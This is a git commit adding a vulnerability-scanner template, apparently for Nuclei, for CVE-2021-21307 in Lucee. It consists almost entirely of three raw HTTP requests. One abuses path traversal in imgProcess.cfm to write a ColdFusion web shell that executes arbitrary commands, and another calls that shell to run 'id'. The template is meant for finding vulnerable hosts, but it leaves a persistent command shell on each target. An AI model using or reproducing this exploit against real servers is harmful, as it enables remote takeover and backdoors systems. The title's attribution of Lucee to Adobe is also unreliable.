Create CVE-2021-21307.yaml

2021-07-18 19:19:19 +05:30 · 2021-07-18 19:19:19 +05:30 · 0a8d2ffdcc
parent ed9418961d
commit 0a8d2ffdcc
1 changed files with 76 additions and 0 deletions
--- a/cves/2021/CVE-2021-21307.yaml
+++ b/cves/2021/CVE-2021-21307.yaml
@ -0,0 +1,76 @@
+id: CVE-2021-21307
+
+info:
+  name: Adobe Lucee RCE
+  author: dhiyaneshDk
+  severity: high
+  reference: https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
+  tags: lucee,adobe,cve2021,rce
+
+requests:
+  - raw:
+      - |
+        POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 8
+
+        imgSrc=a
+      - |
+        POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 790
+
+        imgSrc=
+        <cfoutput>
+        
+        <table>
+        <form method="POST" action="">
+        <tr><td>Command:</td><td><input type=test name="cmd" size=50
+        <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
+        <tr><td>Options:</td><td> <input type=text name="opts" size=50
+        <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
+        <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
+        <cfif isdefined("form.timeout")>value="#form.timeout#"
+        <cfelse> value="5"</cfif>></td></tr>
+        </table>
+        <input type=submit value="Exec" >
+        </form>
+        <cfif isdefined("form.cmd")>
+        <cfsavecontent variable="myVar">
+        <cfexecute name = "#Form.cmd#"
+        arguments = "#Form.opts#"
+        timeout = "#Form.timeout#">
+        </cfexecute>
+        </cfsavecontent>
+        <pre>
+        #HTMLCodeFormat(myVar)#
+        </pre>
+        </cfif>
+        </cfoutput>
+      - |
+        POST /lucee/{{randstr}}.cfm HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+
+        cmd=id&opts=&timeout=5 
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "uid="